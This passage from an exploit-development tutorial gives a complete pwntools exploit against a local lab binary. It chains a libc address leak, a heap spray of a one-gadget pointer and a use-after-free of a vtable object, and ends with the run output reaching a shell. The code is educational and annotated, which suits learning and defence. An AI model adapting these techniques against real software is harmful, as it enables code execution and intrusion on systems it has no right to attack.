...
Code Block
# Tutorial exploit for the accompanying ./heapspray binary (pwntools).
#
# Written for Python 2: `xrange`, the `print` statement and `/` yielding an
# int for the loop count all break under Python 3.  The technique combines an
# address leak (the program prints printf's libc address), a heap spray of a
# one-gadget pointer, and a use-after-free of a "vtable" object.  Every offset
# below (0x55800, 0xf02a4, 0x602000) is specific to the tutorial's libc build
# and binary layout — confirm against the target before drawing conclusions.
from pwn import *

#context.log_level = 'debug'

# Spray geometry.  The heap start is hard-coded: this only works while the brk
# heap begins at a predictable address (presumably a non-PIE binary with no
# heap randomisation — TODO confirm).  Randomising the heap base is exactly the
# assumption a spray of this size is meant to paper over.
startBrk = 0x602000
spraySize = 0x10000                    # bytes per sprayed allocation
sprayRange = 0x5000000                 # total bytes sprayed (80 MiB)
sprayCount = sprayRange /spraySize     # Python 2 integer division -> chunk count
targetOffset = 0x400
# Address the fake vtable will point into: somewhere inside the sprayed region,
# chosen so it lands on a copy of the gadget pointer regardless of exact chunk
# placement.
target = startBrk + sprayRange + targetOffset

p = process('./heapspray')
#sleep(20)

# Info leak: the program prints printf's address.  This single leak is what
# defeats libc ASLR here — the spray alone would not give a usable gadget
# address without it.
p.recvuntil("Printf() address : ")
libcAddr = p.recvuntil('\n')
libcAddr = int(libcAddr,16)
libcBase = libcAddr - 0x55800          # printf offset in the tutorial's libc (build-specific)
oneGadget = libcBase + 0xf02a4         # one-gadget offset in the same libc (build-specific)

log.info('target : '+hex(target))
log.info('libcBase Addr : '+hex(libcBase))
log.info('oneGadget Addr : '+hex(oneGadget))

# Heap spray: request sprayCount allocations, each filled with the gadget
# pointer repeated.  The `- 0x10` presumably leaves room for the malloc chunk
# header so each request stays within one spraySize stride — TODO confirm
# against the allocator in use.  From a defender's view this phase is very
# noisy: tens of MiB of near-identical 64 KiB allocations in a tight loop.
for i in xrange(sprayCount):
    size = spraySize - 0x10
    p.recvuntil("Input size:\n")
    p.send(p32(size))
    p.recvuntil("Input contents:\n")
    buf = p64(oneGadget) * (size // 8)
    buf += 'A' * (size-len(buf))       # pad any remainder below a full pointer
    p.send(buf)
    p.recvuntil("Will you keep typing?(No:0):\n")
    if i == sprayCount-1:
        print "Finished Heap spray!\n"
        p.sendline(str(0))             # 0 = stop allocating, move on
    else:
        p.sendline(str(1))

# Use-after-free stage.  The prompt text suggests the program allocates a
# vtable object, frees it, and lets us reallocate a 160-byte buffer into the
# same slot; the buffer is filled with `target` so every function-pointer slot
# of the stale vtable points into the sprayed region.  The target binary is
# not on this page, so the exact object layout is inferred — verify.
p.recvuntil("Create vtable\n")
p.send("Hello Heap spray & UAF")
p.recvuntil("Input size:\n")
p.send(p32(160))
p.recvuntil("Input contents:\n")
buf = p64(target) * (160 // 8)
buf += 'C' * (160-len(buf))
p.send(buf)

p.interactive()
Code Block
lazenca0x0@ubuntu:~/Exploit/11.Heap Spray$ python exploit.py
[+] Starting local process './heapspray': pid 25405
[*] target : 0x5602400
[*] libcBase Addr : 0x7fc228a49000
[*] oneGadget Addr : 0x7fc228b392a4
Finished Heap spray!
[*] Switching to interactive mode
$ id
uid=1000(lazenca0x0) gid=1000(lazenca0x0) groups=1000(lazenca0x0),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
$
References
- https://en.wikipedia.org/wiki/Heap_spraying
- http://index-of.co.uk/Reverse-Engineering/Heap%20Spray%20%5Bforce%5D.pdf
- http://inaz2.hatenablog.com/entry/2015/03/02/014252
- http://pjongy.tistory.com/132
- http://truthtilltheend.tistory.com/entry/%ED%9E%99-%EC%8A%A4%ED%94%84%EB%A0%88%EC%9D%B4Heap-Spray-%EA%B8%B0%EB%B2%95
- http://hackability.kr/entry/%EC%9D%B5%EC%8A%A4%ED%94%8C%EB%A1%9C%EC%9E%87-%EA%B0%9C%EB%B0%9C-11-Exploitme5-%ED%9E%99-%EC%8A%A4%ED%94%84%EB%A0%88%EC%9E%89-UAF
...